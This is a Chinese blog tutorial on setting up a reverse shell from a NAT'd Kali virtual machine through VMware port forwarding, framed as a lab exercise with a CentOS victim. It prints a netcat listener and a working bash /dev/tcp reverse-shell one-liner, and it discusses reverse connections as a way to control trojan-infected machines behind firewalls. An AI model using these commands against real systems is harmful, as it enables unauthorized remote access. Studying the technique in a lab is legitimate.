如何用内网虚拟机kali实现反弹shell

注:前提是宿主机能被外网访问到(有个公网ip),原理是端口转发。或者用来反弹宿主机所在局域网的机器。所以最好还是买个有外网ip的服务器。

这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。


实验环境

  • 攻击机:kali虚拟机(位于内网)
    ip:192.168.77.128
    在这里插入图片描述

  • 宿主机:win10
    ip:10.8.163.224
    在这里插入图片描述

  • 受害端:centos-7


设置端口转发

虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我把kali虚拟机的2333号端口映射到主机的6666号端口,这样外网其它机器只需访问宿主机的6666号端口即可连接宿主机的虚拟机了。

下面是设置步骤:

编辑→虚拟网络编辑器→NAT设置→添加

在这里插入图片描述在这里插入图片描述


反弹shell

然后把攻击机kali的端口监听打开

nc -lvp 2333

在这里插入图片描述


用受害机centos7生成一个反弹shell,连接宿主机的公网IP10.8.163.224/6666,这样通过端口转发,就会连接到kali虚拟机上。

bash -i >& /dev/tcp/10.8.163.224/6666 0>&1

在这里插入图片描述


我们可以看到kali已经获取到受害机的bash。
在这里插入图片描述


验证

我们用kali在受害机桌面上创建一个hello.txt看看shell生效没。

touch /root/桌面/hello.txt

在这里插入图片描述在这里插入图片描述

为什么要反弹shell?

反弹很好理解,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

什么情况下正向连接不能用?

有如下情况:

  • 某客户机中了你的网马,但是它在局域网内,你直接连接不了。

  • 目标机器的ip动态改变,你不能持续控制。

  • 防火墙等限制,对方机器只能发送请求,不能接收请求。

  • 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值